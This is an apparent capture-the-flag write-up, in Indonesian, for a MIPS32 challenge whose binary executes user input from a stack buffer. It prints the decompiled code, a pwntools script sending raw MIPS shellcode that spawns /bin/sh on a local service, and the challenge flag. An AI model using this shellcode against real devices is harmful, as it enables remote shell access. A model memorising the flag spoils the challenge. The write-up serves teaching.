# MIPS32

    MIPS32 ? shellcode ? oke.

## Solusi

binary ini adalah binary mips, setelah melihat pseudo code, kita sudah bisa menebak bahwa ini
adalah soal shellcode

    void main(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4)
    {
    undefined *puVar1;
    undefined auStack268 [260];
    
    puVar1 = &_gp;
    init();
    puts(&UNK_00465870);
    gets(auStack268);
    printf(&UNK_00465898,auStack268,param_3,param_4,puVar1);
    (*(code *)auStack268)();
    return;
    }

seperti yang terlihat diatas, kita tinggal mengirimkan shellcode mips

    from pwn import *

    r = remote("localhost",13342)
    p = "\xff\xff\x06\x28\xff\xff\xd0\x04\xff\xff\x05\x28\x01\x10\xe4\x27\x0f\xf0\x84\x24\xab\x0f\x02\x24\x0c\x01\x01\x01/bin/sh"
    r.sendline(p)
    r.interactive()

FLAG: hackfest{sh3llc0d3_MIPS32MIPS32MIPS32MIPS32!!}